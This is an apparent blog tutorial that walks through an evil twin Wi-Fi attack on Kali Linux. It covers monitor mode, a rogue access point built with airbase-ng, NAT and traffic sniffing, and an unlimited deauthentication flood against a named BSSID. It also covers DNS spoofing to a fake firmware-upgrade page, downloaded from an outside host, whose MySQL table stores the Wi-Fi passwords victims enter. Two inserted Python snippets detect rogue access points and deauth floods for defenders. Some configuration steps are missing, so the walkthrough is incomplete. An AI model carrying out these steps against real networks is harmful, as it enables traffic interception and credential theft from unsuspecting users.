An evil twin, in network security, is a fake or rogue wireless access point (WAP) that appears to be a genuine hotspot offered by a legitimate provider.

In an evil twin attack, an eavesdropper or hacker fraudulently creates this rogue hotspot to collect the personal data of unsuspecting users. Sensitive data can be stolen by spying on a connection or using a phishing technique.

For example, a hacker using an evil twin exploit may be positioned near an authentic Wi-Fi access point and discover the service set identifier (SSID) and frequency. The hacker may then send a radio signal using the exact same frequency and SSID. To end users, the rogue evil twin appears as their legitimate hotspot with the same name.

Installing required tools:

  • Open a terminal and type:

#apt-get install dnsmasq -y

to install the latest version of the dnsmasq DHCP server in Kali Linux.

Configure tools:

Create a configuration file for dnsmasq with the nano editor.

  • dnsmasq configuration file:

Save the dnsmasq.conf file and exit.

  • Putting the wireless adapter into monitor mode

#airmon-ng start wlan0

Now our card is in monitor mode, without any interference from NetworkManager. We can start monitoring the air with the command:

#airodump-ng wlan0mon

Copy our target’s details for further reference
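How a defender can spot the evil twin from the same kind of airodump-ng-style survey, as an added example that is not part of the original post; the allowlist, scan rows and MAC addresses are constructed, and the simplified CSV layout is an assumption rather than airodump-ng's real output format.

```python
# Evil twin detection over a wireless scan (added example, not from the original post).
# The scan rows are constructed in a simplified 'bssid,channel,privacy,power,essid'
# layout, not real airodump-ng output; all MAC addresses are placeholders.
import csv
from io import StringIO

# Constructed allowlist: SSID -> set of BSSIDs the defender actually operates.
KNOWN_APS = {
    "CorpWiFi": {"00:11:22:33:44:55"},
    "Guest": {"00:11:22:33:44:56"},
}

# Constructed scan: two legitimate APs plus two unknown radios using CorpWiFi's SSID.
SCAN = """\
bssid,channel,privacy,power,essid
00:11:22:33:44:55,6,WPA2,-48,CorpWiFi
00:11:22:33:44:56,6,WPA2,-60,Guest
de:ad:be:ef:00:01,6,OPN,-35,CorpWiFi
de:ad:be:ef:00:02,11,WPA2,-70,CorpWiFi
"""

def parse_scan(text):
    """Parse the simplified CSV into a list of row dicts."""
    return list(csv.DictReader(StringIO(text)))

def find_evil_twins(rows, known=KNOWN_APS):
    """Return one alert per BSSID that advertises an allowlisted SSID without
    being on the allowlist.  Extra indicators: open auth where the real network
    is encrypted, and a stronger signal than the legitimate AP (a rogue AP is
    usually placed close to its victims)."""
    legit_power = {}  # SSID -> strongest signal seen from a legitimate BSSID
    for r in rows:
        if r["bssid"].lower() in known.get(r["essid"], set()):
            legit_power[r["essid"]] = max(legit_power.get(r["essid"], -100), int(r["power"]))
    alerts = []
    for r in rows:
        essid, bssid = r["essid"], r["bssid"].lower()
        if essid not in known or bssid in known[essid]:
            continue
        indicators = ["unknown BSSID for protected SSID"]
        if r["privacy"] == "OPN":
            indicators.append("open auth where encryption expected")
        if essid in legit_power and int(r["power"]) > legit_power[essid]:
            indicators.append("stronger signal than legitimate AP")
        alerts.append({"bssid": bssid, "essid": essid,
                       "channel": int(r["channel"]), "indicators": indicators})
    return alerts
```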

Display all wireless adapters connected to Kali Linux

Set the tx-power of the wireless adapter wlan0mon to the maximum of 1000 mW (30 dBm)

tx-power stands for transmission power. By default it is set to 20 dBm (decibels relative to one milliwatt), or 100 mW.

Power in mW increases tenfold with every 10 dBm. See the dBm to mW table.

If your regulatory country was set to US during installation, your card should be able to operate at 30 dBm (1000 mW).

Start Evil Twin Attack

Begin the Evil Twin attack using airbase-ng:

By default, airbase-ng creates a tap interface (at0) as the wired interface for bridging/routing network traffic via the rogue access point. You can see it with the ifconfig at0 command.

Before at0 can hand out IP addresses, we first need to assign an IP range to it.

Allocate an IP address and subnet mask


The Class A IP address assigned here matches the dhcp-option parameter in the dnsmasq.conf file, which means at0 will act as the default gateway under dnsmasq.

Now we will use our default Internet-facing interface, eth0, to route all of the client's traffic through it.

In other words, this lets the victim access the Internet while we (the attacker) sniff that traffic.

For that, we use the iptables utility to set a firewall rule that handles all of the traffic from at0 exclusively.

You will get similar output if you are using a VM.

Enable NAT by setting Firewall rules in iptables

Make sure you enter the correct interface for --out-interface. eth0 here is the upstream interface through which we send out the packets coming from the at0 interface (rogue AP). The rest is fine.

After entering the above command, if you want to provide Internet access to the victim, enable routing with the command below.

Enable IP Forwarding

Writing "1" to the ip_forward file tells the system to start forwarding traffic (if any) according to the rules defined in iptables; "0" disables forwarding. The rules themselves remain defined until the next reboot.

Start DHCP Listener

#dnsmasq -C ~/Desktop/dnsmasq.conf -d

Start Services

Download Rogue AP configuration files

Get the files for the fake AP from cdn.rootsh3ll.com; these display a fake administrator page that asks the victim to enter the password.

Unzipping Rogue_AP.zip

This command extracts the contents of rogue_AP.zip and copies them to Apache's HTML directory, so that when the victim opens a browser s/he is automatically redirected to the default index.html page.

Database Configuration

Log in as the root user
#mysql -u root -p

Create a new user fakeap with the password fakeap.

This is needed because, since MySQL 5.7, you cannot execute MySQL queries from PHP as the root user.

mysql> create user fakeap@localhost identified by 'fakeap';

Now create the database and table as defined in dbconnect.php:

mysql> create database rogue_AP;

mysql> use rogue_AP;

mysql> create table wpa_keys(password1 varchar(32), password2 varchar(32));

Grant fakeap all permissions on the rogue_AP database:

mysql> grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Log in using the new user (from the shell, not the mysql prompt):

#mysql -u fakeap -p

Select the rogue_AP database

mysql> use rogue_AP;

Insert a test value into the table

mysql> insert into wpa_keys(password1, password2) values ('testpass', 'testpass');

mysql> select * from wpa_keys;

Note that both values are the same here, which means the password and the confirmation password should match.

The Evil Twin attack is now ready; however, we need to wait for a client to connect and see the credentials come in.

In some cases, your client might already be connected to the original AP. You need to disconnect the client forcefully using the aireplay-ng utility.

This is called a deauthentication attack. The attacker sends carefully crafted packets carrying the BSSID of the access point over the air, telling every client to de-authenticate. Connected clients honor the command and disconnect.

#aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon

--deauth 0 = unlimited deauthentication requests

-a = BSSID of the access point
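A sensor-side check for the deauthentication flood described above, as an added example that is not part of the original post; the frame records and MAC addresses are constructed, and the detector is a generic sliding-window counter rather than any particular tool's logic.

```python
# Deauthentication-flood detection (added example, not from the original post).
# A monitor-mode sensor that sees 802.11 management frames counts deauth frames
# per transmitter address in a sliding window.  The frames below are constructed
# (timestamp_s, subtype, bssid, destination) tuples, not a real capture, and the
# MAC addresses are placeholders.
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed: a real AP sends two ordinary deauths over ten seconds, then a
# spoofed flood appears with the same BSSID as the source, aimed at broadcast.
# This is what 'aireplay-ng --deauth 0 -a <BSSID>' looks like from the air.
SAMPLE_FRAMES = (
    [(0.0, "beacon", "00:11:22:33:44:55", BROADCAST),
     (1.0, "deauth", "00:11:22:33:44:55", "aa:bb:cc:00:00:01"),
     (9.0, "deauth", "00:11:22:33:44:55", "aa:bb:cc:00:00:02")]
    + [(12.0 + i * 0.03, "deauth", "00:11:22:33:44:55", BROADCAST) for i in range(15)]
)

def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Return one alert per flood: the moment a BSSID has sent `threshold` deauth
    frames within the last `window_s` seconds.  The alert is raised once per
    flood (not per frame) and re-armed when the rate falls to half the threshold.
    Frames must be in time order."""
    recent = defaultdict(deque)   # bssid -> deque of (ts, dst) inside the window
    flooding = defaultdict(bool)  # bssid -> currently alerting?
    alerts = []
    for ts, subtype, bssid, dst in frames:
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window_s:
            q.popleft()
        if len(q) >= threshold and not flooding[bssid]:
            flooding[bssid] = True
            alerts.append({"time": round(ts, 3), "bssid": bssid, "count": len(q),
                           "broadcast": sum(1 for _, d in q if d == BROADCAST)})
        elif len(q) < threshold // 2:
            flooding[bssid] = False
    return alerts
```

Because the flood is attributed to the legitimate BSSID, the alert names your own AP; that is the expected signature of a spoofed deauth and is the cue to look for a rogue transmitter rather than a misbehaving AP.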

As soon as a client connects to our fake AP, we will see activity in the airbase-ng terminal window like this:

We will also see activity in the DHCP listener terminal window like this:

DNS Spoofing

DNS spoofing redirects every web URL the victim browses to our page. The victim can now access the Internet, and you can sniff the client's traffic at this stage:

When the victim tries to access any website (google.com in this case), s/he sees this page, which tells the victim to enter the password in order to download and install a firmware upgrade.

The victim then types the password.

After the password is submitted, the credentials are saved in our (the attacker's) database.

The victim is then shown an "upgrading" page.

After that the victim can access the Internet, so s/he has no reason to suspect the attack.

Just go back to the previously used command in the MySQL terminal window and check whether a new row is there.

After simulating this, I checked the MySQL DB and here is the output:

And that is how we successfully execute an Evil Twin attack.
